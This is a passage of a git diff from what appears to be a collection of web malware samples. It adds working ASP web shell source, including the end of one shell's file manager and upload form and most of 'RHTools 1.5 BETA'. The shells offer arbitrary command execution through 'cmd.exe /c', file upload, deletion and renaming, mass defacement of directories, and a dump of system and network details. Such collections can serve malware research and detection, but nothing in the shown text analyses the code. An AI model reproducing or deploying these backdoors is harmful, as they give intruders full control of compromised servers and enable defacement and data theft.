Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
Next
%>
<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<table bgcolor=#505050 cellspacing=4><tr><td>
<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
<tr><td align=right ><input type=text size=20 name=DirName><BR>
<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
</tr></td></table></form>
<%
Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
Response.Flush
%>
<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<%
Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
For each file in folder.Files '-->FILEz
Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
Next
Response.write "</select>"
Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
%>
</form>
<%
Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
' ---View Tree Ends Here
' ---Upload Routine starts here
%>
<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
<table bgcolor="#505050" cellpadding="8">
<tr>
<td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
<input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
</font></td>
</tr>
</table>
<BR>
<table bgcolor="#505050" cellpadding="6">
<tr>
<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
</tr>
</table>
</form>
<%
' ---Upload Routine stops here
%>
</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
</body></html>

2967
web-malware-collection-13-06-2012/ASP/EFSO.txt Normal file
View file

File diff suppressed because it is too large Load diff

1004
web-malware-collection-13-06-2012/ASP/ELMALISEKER Backd00r.asp Normal file
View file

File diff suppressed because it is too large Load diff

1012
web-malware-collection-13-06-2012/ASP/NTDaddy.v1.9.txt Normal file
View file

File diff suppressed because it is too large Load diff

792
web-malware-collection-13-06-2012/ASP/RHTools.v1.5-BETA.txt Normal file
View file

@ -0,0 +1,792 @@
<%@ LANGUAGE = VBScript.Encode %>
<%
On Error Resume Next
Server.ScriptTimeOut = 7200
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
endocde = "</body></html>"
onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
Function DeCryptString(strCryptString)
Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
arHexCharSet = Split(strHexCrypData, Hex(intKey))
For i=0 to UBound(arHexCharSet)
strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
Next
DeCryptString = CStr(strRAW)
End Function
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)&copy; BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec = DeCryptString(key)
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
Response.Redirect(pagina)
End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "<br>"
End Sub
Sub showcontent()
Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write "<font face=""arial"" size=""2"">"
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
If drive.isready Then
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
End Select
response.write "<b>Tipo:</b> " & tipodrive & "<br>"
response.write "<b>Nome: </b>" & nomedrive & "<br>"
response.write "<b>Sistema de Arquivos: </b>"
If drive.isready Then
set sp=fs.getdrive(str)
response.write sp.filesystem & "<br>"
Else
response.write "-<br>"
End If
Response.Write "<b>Espaço Livre: </b>"
If drive.isready Then
freespace = (drive.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<b>Espaço Total: </b>"
If drive.isready Then
totalspace = (drive.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<br>"
Next
Response.Write "</font>"
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
backlevel = Left(raiz,barrapos)
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
Else
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
End If
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each folderItem in ColFolders
Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
next
Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
marcatabela = NOT marcatabela
next
Response.Write "</table>"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
End If
Case "put"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
varpath = Trim(Request.QueryString("path"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each FilesItem0 in ColFiles0
Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
next
Response.Write "</table>"
Else
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
End If
End If
Case "del"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
MyFile.Delete
If Err.Number = 0 Then
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
End If
Case "ren"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
arquivo = showobj(caminho)
Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
"<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
"<input type=""hidden"" name=""action"" value=""ren"">" & _
"<input type=""hidden"" name=""status"" value=""2"">" & _
"<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
"Digite o novo nome: <input type=""text"" name=""newname"">" & _
"&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
"</form>"
Else
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End If
Case "error"
Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
Case "cmd"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write "<font face=""arial"">"
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "<br><font face=arial size=2>"
Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
Next
Response.Write "<br><b>FÍSICO:</b><br>"
Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
Response.Write "<br><b>LÓGICO:</b><br>"
Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
